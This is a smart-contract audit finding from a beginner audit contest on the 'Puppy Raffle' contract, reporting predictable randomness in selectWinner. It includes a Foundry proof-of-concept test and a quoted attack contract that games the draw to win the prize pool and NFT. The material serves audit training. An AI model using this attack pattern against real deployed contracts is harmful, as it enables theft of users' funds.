Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

source of randomness used can easily be guessed

yum_cutty

Root + Impact

Description

the way PuppyRaffle::selectWinner pick a winner is by getting a random number, thereby selecting a lucky person from the PuppyRaffle::players. the source of randomness is depends on: msg.sender, block.timestamp, block.difficulty and players length.

function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
uint256 winnerIndex =
@>>> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
// ...
// We use a different RNG calculate from the winnerIndex to determine rarity
@>>> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;
if (rarity <= COMMON_RARITY) {
tokenIdToRarity[tokenId] = COMMON_RARITY;
} else if (rarity <= COMMON_RARITY + RARE_RARITY) {
tokenIdToRarity[tokenId] = RARE_RARITY;
} else {
tokenIdToRarity[tokenId] = LEGENDARY_RARITY;
}
// ...
}

however, the source of the randomness used by the protocol can easily be guessed, severely breaking the raffle functionality of having an un-guessable randomness, that the winner should only rely on luck

Risk

Likelihood: High

  • as long as the guess is in within the same transaction of the randomness being generated, it can easily be guessed by anyone, with 100% accuracy at all time

Impact: Medium/Low (depending on how an attacker can take this advantage for their own purpose)

  • severely breaking the purpose of randomness, that should not be guessed easily, and mostly requires luck

Proof of Concept

a little PoC function below demonstrate how the current randomness formula can easily be guessed

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
pragma experimental ABIEncoderV2;
import {Test, console} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";
contract PuppyRaffleTest is Test {
PuppyRaffle puppyRaffle;
uint256 entranceFee = 1e18;
address feeAddress = address(99);
uint256 duration = 1 days;
function setUp() public {
puppyRaffle = new PuppyRaffle(
entranceFee,
feeAddress,
duration
);
deal(address(this), 1000000000 ether);
}
function test_randomness_guessable() public {
// prepare participants and enter raffle
address[] memory participants = new address[](50);
for (uint256 i = 0; i < 50; i++) {
participants[i] = address(uint160(i + 1));
}
puppyRaffle.enterRaffle{value: entranceFee * participants.length}(participants);
// fast forward time to after raffle duration
vm.warp(block.timestamp + duration + 1 seconds);
// we can directly guess the randomness here
// by frontrun the selectWinner call
uint256 randomnessSource = uint256(
// directly copied the randomness formula from the codebase
keccak256(abi.encodePacked(
// msg.sender, <-- caller of the selectWinner function is address(this)
address(this),
block.timestamp,
block.difficulty
))
// note that it is possible to check total elements off-chain for the PuppyRaffle::players array
// for simplicity, we hardcode it here ...
) % participants.length;
address guessedWinner = participants[randomnessSource];
// frontrun done, tx starts here ...
puppyRaffle.selectWinner();
assertEq(
guessedWinner,
puppyRaffle.previousWinner()
);
}
}

create a new test file, paste the above PoC into the newly created test file, and run it.

Recommended Mitigation

consider using Chainlink VRF as the source of randomness, for both choosing winner and price NFT rarity

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!